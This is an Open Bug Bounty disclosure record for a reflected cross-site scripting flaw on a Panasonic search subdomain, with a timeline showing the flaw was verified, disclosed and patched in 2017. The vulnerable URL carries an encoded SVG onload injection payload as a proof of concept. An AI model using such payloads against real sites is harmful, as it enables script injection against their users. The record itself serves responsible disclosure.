search-ac.va.panasonic.co.jp XSS vulnerability

2017-07-11T23:28:00
ID OBB:263136
Type openbugbounty
Reporter LewisWildgoose
Modified 2017-10-24T09:50:00

Description

Vulnerable URL:
http://search-ac.va.panasonic.co.jp/en_cross/search.x?q=search-ac.va.panasonic.co.jp%2Fen_cross%2Fsearch.x%3Fq%3D%21%22%3E%3Csvg+onload%3Dconfirm%28%22OPENBUGBOUNTY%22%29%3E&ie;=utf8&page;=1&pagemax;=10&imgsize;=3&pdf;=ok&zoom;=1&page;=1&sort;=0&ctor;=0&lfor;=0&ref;=search-ac.va.panasonic.co.jp&pid;=xVd9iECAE07KOb8finLydw..&qid;=fwlMvEmb_Xq24PbLzHVM19ugVEtFCiFs
Details:

Description| Value
---|---
Patched:| Yes, at 24.10.2017
Latest check for patch:| 24.10.2017 09:50 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check search-ac.va.panasonic.co.jp SSL connection:| (Grade: B)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 July, 2017 23:28 GMT
Vulnerability existence verified and confirmed| 12 July, 2017 06:53 GMT
Generic security notifications sent to website owner| 12 July, 2017 06:53 GMT
Notification sent to subscribers (without technical details)| 12 July, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 4 October, 2017 07:18 GMT
Vulnerability patched by the website owner| 24 October, 2017 09:50 GMT